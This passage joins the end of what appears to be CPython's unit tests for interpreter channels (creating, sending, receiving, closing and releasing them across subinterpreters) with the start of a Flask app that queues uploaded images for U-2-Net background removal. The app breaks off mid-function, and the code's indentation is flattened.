pickle.dump(ns, chan)
""")
interpreters.run_string(self.id, script, shared)
with open(r, 'rb') as chan:
ns = pickle.load(chan)
self.assertEqual(ns['__name__'], b'not __main__')
def test_main_reused(self):
r, w = os.pipe()
interpreters.run_string(self.id, dedent(f"""
spam = True
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
del ns, pickle, chan
"""))
with open(r, 'rb') as chan:
ns1 = pickle.load(chan)
r, w = os.pipe()
interpreters.run_string(self.id, dedent(f"""
eggs = False
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
"""))
with open(r, 'rb') as chan:
ns2 = pickle.load(chan)
self.assertIn('spam', ns1)
self.assertNotIn('eggs', ns1)
self.assertIn('eggs', ns2)
self.assertIn('spam', ns2)
def test_execution_namespace_is_main(self):
r, w = os.pipe()
script = dedent(f"""
spam = 42
ns = dict(vars())
ns['__builtins__'] = str(ns['__builtins__'])
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
""")
interpreters.run_string(self.id, script)
with open(r, 'rb') as chan:
ns = pickle.load(chan)
ns.pop('__builtins__')
ns.pop('__loader__')
self.assertEqual(ns, {
'__name__': '__main__',
'__annotations__': {},
'__doc__': None,
'__package__': None,
'__spec__': None,
'spam': 42,
})
# XXX Fix this test!
@unittest.skip('blocking forever')
def test_still_running_at_exit(self):
script = dedent(f"""
from textwrap import dedent
import threading
import _xxsubinterpreters as _interpreters
id = _interpreters.create()
def f():
_interpreters.run_string(id, dedent('''
import time
# Give plenty of time for the main interpreter to finish.
time.sleep(1_000_000)
'''))
t = threading.Thread(target=f)
t.start()
""")
with support.temp_dir() as dirname:
filename = script_helper.make_script(dirname, 'interp', script)
with script_helper.spawn_python(filename) as proc:
retcode = proc.wait()
self.assertEqual(retcode, 0)
##################################
# channel tests
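# A minimal sketch of the low-level channel round trip that the tests below
# exercise (assuming `interpreters` refers to the _xxsubinterpreters module,
# as it does throughout this test file):
#
#     cid = interpreters.channel_create()
#     interpreters.channel_send(cid, b'spam')
#     assert interpreters.channel_recv(cid) == b'spam'
#     interpreters.channel_close(cid, force=True)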
class ChannelIDTests(TestBase):
def test_default_kwargs(self):
cid = interpreters._channel_id(10, force=True)
self.assertEqual(int(cid), 10)
self.assertEqual(cid.end, 'both')
def test_with_kwargs(self):
cid = interpreters._channel_id(10, send=True, force=True)
self.assertEqual(cid.end, 'send')
cid = interpreters._channel_id(10, send=True, recv=False, force=True)
self.assertEqual(cid.end, 'send')
cid = interpreters._channel_id(10, recv=True, force=True)
self.assertEqual(cid.end, 'recv')
cid = interpreters._channel_id(10, recv=True, send=False, force=True)
self.assertEqual(cid.end, 'recv')
cid = interpreters._channel_id(10, send=True, recv=True, force=True)
self.assertEqual(cid.end, 'both')
def test_coerce_id(self):
class Int(str):
def __index__(self):
return 10
cid = interpreters._channel_id(Int(), force=True)
self.assertEqual(int(cid), 10)
def test_bad_id(self):
self.assertRaises(TypeError, interpreters._channel_id, object())
self.assertRaises(TypeError, interpreters._channel_id, 10.0)
self.assertRaises(TypeError, interpreters._channel_id, '10')
self.assertRaises(TypeError, interpreters._channel_id, b'10')
self.assertRaises(ValueError, interpreters._channel_id, -1)
self.assertRaises(OverflowError, interpreters._channel_id, 2**64)
def test_bad_kwargs(self):
with self.assertRaises(ValueError):
interpreters._channel_id(10, send=False, recv=False)
def test_does_not_exist(self):
cid = interpreters.channel_create()
with self.assertRaises(interpreters.ChannelNotFoundError):
interpreters._channel_id(int(cid) + 1) # unforced
def test_str(self):
cid = interpreters._channel_id(10, force=True)
self.assertEqual(str(cid), '10')
def test_repr(self):
cid = interpreters._channel_id(10, force=True)
self.assertEqual(repr(cid), 'ChannelID(10)')
cid = interpreters._channel_id(10, send=True, force=True)
self.assertEqual(repr(cid), 'ChannelID(10, send=True)')
cid = interpreters._channel_id(10, recv=True, force=True)
self.assertEqual(repr(cid), 'ChannelID(10, recv=True)')
cid = interpreters._channel_id(10, send=True, recv=True, force=True)
self.assertEqual(repr(cid), 'ChannelID(10)')
def test_equality(self):
cid1 = interpreters.channel_create()
cid2 = interpreters._channel_id(int(cid1))
cid3 = interpreters.channel_create()
self.assertTrue(cid1 == cid1)
self.assertTrue(cid1 == cid2)
self.assertTrue(cid1 == int(cid1))
self.assertTrue(int(cid1) == cid1)
self.assertTrue(cid1 == float(int(cid1)))
self.assertTrue(float(int(cid1)) == cid1)
self.assertFalse(cid1 == float(int(cid1)) + 0.1)
self.assertFalse(cid1 == str(int(cid1)))
self.assertFalse(cid1 == 2**1000)
self.assertFalse(cid1 == float('inf'))
self.assertFalse(cid1 == 'spam')
self.assertFalse(cid1 == cid3)
self.assertFalse(cid1 != cid1)
self.assertFalse(cid1 != cid2)
self.assertTrue(cid1 != cid3)
class ChannelTests(TestBase):
def test_create_cid(self):
cid = interpreters.channel_create()
self.assertIsInstance(cid, interpreters.ChannelID)
def test_sequential_ids(self):
before = interpreters.channel_list_all()
id1 = interpreters.channel_create()
id2 = interpreters.channel_create()
id3 = interpreters.channel_create()
after = interpreters.channel_list_all()
self.assertEqual(id2, int(id1) + 1)
self.assertEqual(id3, int(id2) + 1)
self.assertEqual(set(after) - set(before), {id1, id2, id3})
def test_ids_global(self):
id1 = interpreters.create()
out = _run_output(id1, dedent("""
import _xxsubinterpreters as _interpreters
cid = _interpreters.channel_create()
print(cid)
"""))
cid1 = int(out.strip())
id2 = interpreters.create()
out = _run_output(id2, dedent("""
import _xxsubinterpreters as _interpreters
cid = _interpreters.channel_create()
print(cid)
"""))
cid2 = int(out.strip())
self.assertEqual(cid2, int(cid1) + 1)
####################
def test_send_recv_main(self):
cid = interpreters.channel_create()
orig = b'spam'
interpreters.channel_send(cid, orig)
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, orig)
self.assertIsNot(obj, orig)
def test_send_recv_same_interpreter(self):
id1 = interpreters.create()
out = _run_output(id1, dedent("""
import _xxsubinterpreters as _interpreters
cid = _interpreters.channel_create()
orig = b'spam'
_interpreters.channel_send(cid, orig)
obj = _interpreters.channel_recv(cid)
assert obj is not orig
assert obj == orig
"""))
def test_send_recv_different_interpreters(self):
cid = interpreters.channel_create()
id1 = interpreters.create()
out = _run_output(id1, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_send({cid}, b'spam')
"""))
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
def test_send_recv_different_threads(self):
cid = interpreters.channel_create()
def f():
while True:
try:
obj = interpreters.channel_recv(cid)
break
except interpreters.ChannelEmptyError:
time.sleep(0.1)
interpreters.channel_send(cid, obj)
t = threading.Thread(target=f)
t.start()
interpreters.channel_send(cid, b'spam')
t.join()
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
def test_send_recv_different_interpreters_and_threads(self):
cid = interpreters.channel_create()
id1 = interpreters.create()
out = None
def f():
nonlocal out
out = _run_output(id1, dedent(f"""
import time
import _xxsubinterpreters as _interpreters
while True:
try:
obj = _interpreters.channel_recv({cid})
break
except _interpreters.ChannelEmptyError:
time.sleep(0.1)
assert(obj == b'spam')
_interpreters.channel_send({cid}, b'eggs')
"""))
t = threading.Thread(target=f)
t.start()
interpreters.channel_send(cid, b'spam')
t.join()
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'eggs')
def test_send_not_found(self):
with self.assertRaises(interpreters.ChannelNotFoundError):
interpreters.channel_send(10, b'spam')
def test_recv_not_found(self):
with self.assertRaises(interpreters.ChannelNotFoundError):
interpreters.channel_recv(10)
def test_recv_empty(self):
cid = interpreters.channel_create()
with self.assertRaises(interpreters.ChannelEmptyError):
interpreters.channel_recv(cid)
def test_run_string_arg_unresolved(self):
cid = interpreters.channel_create()
interp = interpreters.create()
out = _run_output(interp, dedent("""
import _xxsubinterpreters as _interpreters
print(cid.end)
_interpreters.channel_send(cid, b'spam')
"""),
dict(cid=cid.send))
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
self.assertEqual(out.strip(), 'send')
# XXX For now there is no high-level channel into which the
# sent channel ID can be converted...
# Note: this test caused crashes on some buildbots (bpo-33615).
@unittest.skip('disabled until high-level channels exist')
def test_run_string_arg_resolved(self):
cid = interpreters.channel_create()
cid = interpreters._channel_id(cid, _resolve=True)
interp = interpreters.create()
out = _run_output(interp, dedent("""
import _xxsubinterpreters as _interpreters
print(chan.id.end)
_interpreters.channel_send(chan.id, b'spam')
"""),
dict(chan=cid.send))
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
self.assertEqual(out.strip(), 'send')
# close
def test_close_single_user(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_close(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_multiple_users(self):
cid = interpreters.channel_create()
id1 = interpreters.create()
id2 = interpreters.create()
interpreters.run_string(id1, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_send({cid}, b'spam')
"""))
interpreters.run_string(id2, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_recv({cid})
"""))
interpreters.channel_close(cid)
with self.assertRaises(interpreters.RunFailedError) as cm:
interpreters.run_string(id1, dedent(f"""
_interpreters.channel_send({cid}, b'spam')
"""))
self.assertIn('ChannelClosedError', str(cm.exception))
with self.assertRaises(interpreters.RunFailedError) as cm:
interpreters.run_string(id2, dedent(f"""
_interpreters.channel_send({cid}, b'spam')
"""))
self.assertIn('ChannelClosedError', str(cm.exception))
def test_close_multiple_times(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_close(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_close(cid)
def test_close_empty(self):
tests = [
(False, False),
(True, False),
(False, True),
(True, True),
]
for send, recv in tests:
with self.subTest((send, recv)):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_close(cid, send=send, recv=recv)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_defaults_with_unused_items(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
with self.assertRaises(interpreters.ChannelNotEmptyError):
interpreters.channel_close(cid)
interpreters.channel_recv(cid)
interpreters.channel_send(cid, b'eggs')
def test_close_recv_with_unused_items_unforced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
with self.assertRaises(interpreters.ChannelNotEmptyError):
interpreters.channel_close(cid, recv=True)
interpreters.channel_recv(cid)
interpreters.channel_send(cid, b'eggs')
interpreters.channel_recv(cid)
interpreters.channel_recv(cid)
interpreters.channel_close(cid, recv=True)
def test_close_send_with_unused_items_unforced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_close(cid, send=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
interpreters.channel_recv(cid)
interpreters.channel_recv(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_both_with_unused_items_unforced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
with self.assertRaises(interpreters.ChannelNotEmptyError):
interpreters.channel_close(cid, recv=True, send=True)
interpreters.channel_recv(cid)
interpreters.channel_send(cid, b'eggs')
interpreters.channel_recv(cid)
interpreters.channel_recv(cid)
interpreters.channel_close(cid, recv=True)
def test_close_recv_with_unused_items_forced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_close(cid, recv=True, force=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_send_with_unused_items_forced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_close(cid, send=True, force=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_both_with_unused_items_forced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_close(cid, send=True, recv=True, force=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_never_used(self):
cid = interpreters.channel_create()
interpreters.channel_close(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'spam')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_by_unassociated_interp(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interp = interpreters.create()
interpreters.run_string(interp, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_close({cid}, force=True)
"""))
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_close(cid)
def test_close_used_multiple_times_by_single_user(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_close(cid, force=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
class ChannelReleaseTests(TestBase):
# XXX Add more test coverage a la the tests for close().
"""
- main / interp / other
- run in: current thread / new thread / other thread / different threads
- end / opposite
- force / no force
- used / not used (associated / not associated)
- empty / emptied / never emptied / partly emptied
- closed / not closed
- released / not released
- creator (interp) / other
- associated interpreter not running
- associated interpreter destroyed
"""
"""
use
pre-release
release
after
check
"""
"""
release in: main, interp1
creator: same, other (incl. interp2)
use: None,send,recv,send/recv in None,same,other(incl. interp2),same+other(incl. interp2),all
pre-release: None,send,recv,both in None,same,other(incl. interp2),same+other(incl. interp2),all
pre-release forced: None,send,recv,both in None,same,other(incl. interp2),same+other(incl. interp2),all
release: same
release forced: same
use after: None,send,recv,send/recv in None,same,other(incl. interp2),same+other(incl. interp2),all
release after: None,send,recv,send/recv in None,same,other(incl. interp2),same+other(incl. interp2),all
check released: send/recv for same/other(incl. interp2)
check closed: send/recv for same/other(incl. interp2)
"""
def test_single_user(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_release(cid, send=True, recv=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_multiple_users(self):
cid = interpreters.channel_create()
id1 = interpreters.create()
id2 = interpreters.create()
interpreters.run_string(id1, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_send({cid}, b'spam')
"""))
out = _run_output(id2, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_recv({cid})
_interpreters.channel_release({cid})
print(repr(obj))
"""))
interpreters.run_string(id1, dedent(f"""
_interpreters.channel_release({cid})
"""))
self.assertEqual(out.strip(), "b'spam'")
def test_no_kwargs(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_release(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_multiple_times(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_release(cid, send=True, recv=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_release(cid, send=True, recv=True)
def test_with_unused_items(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_release(cid, send=True, recv=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_never_used(self):
cid = interpreters.channel_create()
interpreters.channel_release(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'spam')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_by_unassociated_interp(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interp = interpreters.create()
interpreters.run_string(interp, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_release({cid})
"""))
obj = interpreters.channel_recv(cid)
interpreters.channel_release(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
self.assertEqual(obj, b'spam')
def test_close_if_unassociated(self):
# XXX Something's not right with this test...
cid = interpreters.channel_create()
interp = interpreters.create()
interpreters.run_string(interp, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_send({cid}, b'spam')
_interpreters.channel_release({cid})
"""))
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_partially(self):
# XXX Is partial close too weird/confusing?
cid = interpreters.channel_create()
interpreters.channel_send(cid, None)
interpreters.channel_recv(cid)
interpreters.channel_send(cid, b'spam')
interpreters.channel_release(cid, send=True)
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
def test_used_multiple_times_by_single_user(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_release(cid, send=True, recv=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
class ChannelCloseFixture(namedtuple('ChannelCloseFixture',
'end interp other extra creator')):
# Set this to True to avoid creating interpreters, e.g. when
# scanning through test permutations without running them.
QUICK = False
def __new__(cls, end, interp, other, extra, creator):
assert end in ('send', 'recv')
if cls.QUICK:
known = {}
else:
interp = Interpreter.from_raw(interp)
other = Interpreter.from_raw(other)
extra = Interpreter.from_raw(extra)
known = {
interp.name: interp,
other.name: other,
extra.name: extra,
}
if not creator:
creator = 'same'
self = super().__new__(cls, end, interp, other, extra, creator)
self._prepped = set()
self._state = ChannelState()
self._known = known
return self
@property
def state(self):
return self._state
@property
def cid(self):
try:
return self._cid
except AttributeError:
creator = self._get_interpreter(self.creator)
self._cid = self._new_channel(creator)
return self._cid
def get_interpreter(self, interp):
interp = self._get_interpreter(interp)
self._prep_interpreter(interp)
return interp
def expect_closed_error(self, end=None):
if end is None:
end = self.end
if end == 'recv' and self.state.closed == 'send':
return False
return bool(self.state.closed)
def prep_interpreter(self, interp):
self._prep_interpreter(interp)
def record_action(self, action, result):
self._state = result
def clean_up(self):
clean_up_interpreters()
clean_up_channels()
# internal methods
def _new_channel(self, creator):
if creator.name == 'main':
return interpreters.channel_create()
else:
ch = interpreters.channel_create()
run_interp(creator.id, f"""
import _xxsubinterpreters
cid = _xxsubinterpreters.channel_create()
# We purposefully send back an int to avoid tying the
# channel to the other interpreter.
_xxsubinterpreters.channel_send({ch}, int(cid))
del _xxsubinterpreters
""")
self._cid = interpreters.channel_recv(ch)
return self._cid
def _get_interpreter(self, interp):
if interp in ('same', 'interp'):
return self.interp
elif interp == 'other':
return self.other
elif interp == 'extra':
return self.extra
else:
name = interp
try:
interp = self._known[name]
except KeyError:
interp = self._known[name] = Interpreter(name)
return interp
def _prep_interpreter(self, interp):
if interp.id in self._prepped:
return
self._prepped.add(interp.id)
if interp.name == 'main':
return
run_interp(interp.id, f"""
import _xxsubinterpreters as interpreters
import test.test__xxsubinterpreters as helpers
ChannelState = helpers.ChannelState
try:
cid
except NameError:
cid = interpreters._channel_id({self.cid})
""")
@unittest.skip('these tests take several hours to run')
class ExhaustiveChannelTests(TestBase):
"""
- main / interp / other
- run in: current thread / new thread / other thread / different threads
- end / opposite
- force / no force
- used / not used (associated / not associated)
- empty / emptied / never emptied / partly emptied
- closed / not closed
- released / not released
- creator (interp) / other
- associated interpreter not running
- associated interpreter destroyed
- close after unbound
"""
"""
use
pre-close
close
after
check
"""
"""
close in: main, interp1
creator: same, other, extra
use: None,send,recv,send/recv in None,same,other,same+other,all
pre-close: None,send,recv in None,same,other,same+other,all
pre-close forced: None,send,recv in None,same,other,same+other,all
close: same
close forced: same
use after: None,send,recv,send/recv in None,same,other,extra,same+other,all
close after: None,send,recv,send/recv in None,same,other,extra,same+other,all
check closed: send/recv for same/other(incl. interp2)
"""
def iter_action_sets(self):
# - used / not used (associated / not associated)
# - empty / emptied / never emptied / partly emptied
# - closed / not closed
# - released / not released
# never used
yield []
# only pre-closed (and possible used after)
for closeactions in self._iter_close_action_sets('same', 'other'):
yield closeactions
for postactions in self._iter_post_close_action_sets():
yield closeactions + postactions
for closeactions in self._iter_close_action_sets('other', 'extra'):
yield closeactions
for postactions in self._iter_post_close_action_sets():
yield closeactions + postactions
# used
for useactions in self._iter_use_action_sets('same', 'other'):
yield useactions
for closeactions in self._iter_close_action_sets('same', 'other'):
actions = useactions + closeactions
yield actions
for postactions in self._iter_post_close_action_sets():
yield actions + postactions
for closeactions in self._iter_close_action_sets('other', 'extra'):
actions = useactions + closeactions
yield actions
for postactions in self._iter_post_close_action_sets():
yield actions + postactions
for useactions in self._iter_use_action_sets('other', 'extra'):
yield useactions
for closeactions in self._iter_close_action_sets('same', 'other'):
actions = useactions + closeactions
yield actions
for postactions in self._iter_post_close_action_sets():
yield actions + postactions
for closeactions in self._iter_close_action_sets('other', 'extra'):
actions = useactions + closeactions
yield actions
for postactions in self._iter_post_close_action_sets():
yield actions + postactions
def _iter_use_action_sets(self, interp1, interp2):
interps = (interp1, interp2)
# only recv end used
yield [
ChannelAction('use', 'recv', interp1),
]
yield [
ChannelAction('use', 'recv', interp2),
]
yield [
ChannelAction('use', 'recv', interp1),
ChannelAction('use', 'recv', interp2),
]
# never emptied
yield [
ChannelAction('use', 'send', interp1),
]
yield [
ChannelAction('use', 'send', interp2),
]
yield [
ChannelAction('use', 'send', interp1),
ChannelAction('use', 'send', interp2),
]
# partially emptied
for interp1 in interps:
for interp2 in interps:
for interp3 in interps:
yield [
ChannelAction('use', 'send', interp1),
ChannelAction('use', 'send', interp2),
ChannelAction('use', 'recv', interp3),
]
# fully emptied
for interp1 in interps:
for interp2 in interps:
for interp3 in interps:
for interp4 in interps:
yield [
ChannelAction('use', 'send', interp1),
ChannelAction('use', 'send', interp2),
ChannelAction('use', 'recv', interp3),
ChannelAction('use', 'recv', interp4),
]
def _iter_close_action_sets(self, interp1, interp2):
ends = ('recv', 'send')
interps = (interp1, interp2)
for force in (True, False):
op = 'force-close' if force else 'close'
for interp in interps:
for end in ends:
yield [
ChannelAction(op, end, interp),
]
for recvop in ('close', 'force-close'):
for sendop in ('close', 'force-close'):
for recv in interps:
for send in interps:
yield [
ChannelAction(recvop, 'recv', recv),
ChannelAction(sendop, 'send', send),
]
def _iter_post_close_action_sets(self):
for interp in ('same', 'extra', 'other'):
yield [
ChannelAction('use', 'recv', interp),
]
yield [
ChannelAction('use', 'send', interp),
]
def run_actions(self, fix, actions):
for action in actions:
self.run_action(fix, action)
def run_action(self, fix, action, *, hideclosed=True):
end = action.resolve_end(fix.end)
interp = action.resolve_interp(fix.interp, fix.other, fix.extra)
fix.prep_interpreter(interp)
if interp.name == 'main':
result = run_action(
fix.cid,
action.action,
end,
fix.state,
hideclosed=hideclosed,
)
fix.record_action(action, result)
else:
_cid = interpreters.channel_create()
run_interp(interp.id, f"""
result = helpers.run_action(
{fix.cid},
{repr(action.action)},
{repr(end)},
{repr(fix.state)},
hideclosed={hideclosed},
)
interpreters.channel_send({_cid}, result.pending.to_bytes(1, 'little'))
interpreters.channel_send({_cid}, b'X' if result.closed else b'')
""")
result = ChannelState(
pending=int.from_bytes(interpreters.channel_recv(_cid), 'little'),
closed=bool(interpreters.channel_recv(_cid)),
)
fix.record_action(action, result)
def iter_fixtures(self):
# XXX threads?
interpreters = [
('main', 'interp', 'extra'),
('interp', 'main', 'extra'),
('interp1', 'interp2', 'extra'),
('interp1', 'interp2', 'main'),
]
for interp, other, extra in interpreters:
for creator in ('same', 'other', 'creator'):
for end in ('send', 'recv'):
yield ChannelCloseFixture(end, interp, other, extra, creator)
def _close(self, fix, *, force):
op = 'force-close' if force else 'close'
close = ChannelAction(op, fix.end, 'same')
if not fix.expect_closed_error():
self.run_action(fix, close, hideclosed=False)
else:
with self.assertRaises(interpreters.ChannelClosedError):
self.run_action(fix, close, hideclosed=False)
def _assert_closed_in_interp(self, fix, interp=None):
if interp is None or interp.name == 'main':
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(fix.cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(fix.cid, b'spam')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_close(fix.cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_close(fix.cid, force=True)
else:
run_interp(interp.id, f"""
with helpers.expect_channel_closed():
interpreters.channel_recv(cid)
""")
run_interp(interp.id, f"""
with helpers.expect_channel_closed():
interpreters.channel_send(cid, b'spam')
""")
run_interp(interp.id, f"""
with helpers.expect_channel_closed():
interpreters.channel_close(cid)
""")
run_interp(interp.id, f"""
with helpers.expect_channel_closed():
interpreters.channel_close(cid, force=True)
""")
def _assert_closed(self, fix):
self.assertTrue(fix.state.closed)
for _ in range(fix.state.pending):
interpreters.channel_recv(fix.cid)
self._assert_closed_in_interp(fix)
for interp in ('same', 'other'):
interp = fix.get_interpreter(interp)
if interp.name == 'main':
continue
self._assert_closed_in_interp(fix, interp)
interp = fix.get_interpreter('fresh')
self._assert_closed_in_interp(fix, interp)
def _iter_close_tests(self, verbose=False):
i = 0
for actions in self.iter_action_sets():
print()
for fix in self.iter_fixtures():
i += 1
if i > 1000:
return
if verbose:
if (i - 1) % 6 == 0:
print()
print(i, fix, '({} actions)'.format(len(actions)))
else:
if (i - 1) % 6 == 0:
print(' ', end='')
print('.', end=''); sys.stdout.flush()
yield i, fix, actions
if verbose:
print('---')
print()
# This is useful for scanning through the possible tests.
def _skim_close_tests(self):
ChannelCloseFixture.QUICK = True
for i, fix, actions in self._iter_close_tests():
pass
def test_close(self):
for i, fix, actions in self._iter_close_tests():
with self.subTest('{} {} {}'.format(i, fix, actions)):
fix.prep_interpreter(fix.interp)
self.run_actions(fix, actions)
self._close(fix, force=False)
self._assert_closed(fix)
# XXX Things slow down if we have too many interpreters.
fix.clean_up()
def test_force_close(self):
for i, fix, actions in self._iter_close_tests():
with self.subTest('{} {} {}'.format(i, fix, actions)):
fix.prep_interpreter(fix.interp)
self.run_actions(fix, actions)
self._close(fix, force=True)
self._assert_closed(fix)
# XXX Things slow down if we have too many interpreters.
fix.clean_up()
if __name__ == '__main__':
unittest.main()
|
app.py
|
import os
import io
import uuid
import shutil
import sys
import threading
import time
from queue import Empty, Queue
import cv2
from flask import Flask, render_template, flash, send_file, request, jsonify, url_for
from PIL import Image
import numpy as np
from u2net_test import U_2net
from werkzeug.utils import secure_filename
#################################################################
app = Flask(__name__, template_folder="templates", static_url_path="/static")
DATA_FOLDER = "data"
# Request queue used to serialize and batch incoming inference requests
requests_queue = Queue()
BATCH_SIZE = 1
CHECK_INTERVAL = 0.1
##################################################################
# Load the pre-trained U-2-Net model once at startup
net = U_2net.getNet()
# Run the model on a single uploaded file and return the path of the result
def run(input_file, file_type, f_path):
try:
if file_type == "image":
f_name = str(uuid.uuid4())
save_path = f_path + '/' + f_name + '.jpg'
# Save the original image
input_file.save(save_path)
# Run model
image_list = U_2net.getData(f_path)
loader = U_2net.getLoader(image_list)
U_2net.run(image_list, loader, net, f_path)
# The output directory now contains the original .jpg plus the generated .png (or just the .png)
# Build and return the path of the resulting .png
result_path = f_path + '/' + f_name + '.png'
return result_path
except Exception as e:
print(e)
return 500
# Queueing
def handle_requests_by_batch():
try:
while True:
requests_batch = []
while not (
len(requests_batch)
>= BATCH_SIZE # or
# (len(requests_batch) > 0 #and time.time() - requests_batch[0]['time'] > BATCH_TIMEOUT)
):
try:
requests_batch.append(
requests_queue.get(timeout=CHECK_INTERVAL))
except Empty:
continue
batch_outputs = []
for request in requests_batch:
batch_outputs.append(
run(request["input"][0], request["input"]
[1], request["input"][2])
)
for request, output in zip(requests_batch, batch_outputs):
request["output"] = output
except Exception as e:
while not requests_queue.empty():
requests_queue.get()
print(e)
# Thread Start
threading.Thread(target=handle_requests_by_batch).start()
@app.route("/")
def main():
return render_template("index.html")
@app.route("/predict", methods=["POST"])
def predict():
try:
# print(requests_queue.qsize())
if requests_queue.qsize() >= 1:
return jsonify({"message": "Too Many Requests"}), 429
input_file = request.files["source"]
file_type = request.form["file_type"]
if file_type == "image":
if input_file.content_type not in ["image/jpeg", "image/jpg", "image/png"]:
return jsonify({"message": "Only support jpeg, jpg or png"}), 400
# mkdir and path setting
f_id = str(uuid.uuid4())
f_path = os.path.join(DATA_FOLDER, f_id)
os.makedirs(f_path, exist_ok=True)
req = {"input": [input_file, file_type, f_path]}
requests_queue.put(req)
# Wait until the worker thread attaches the output to this request
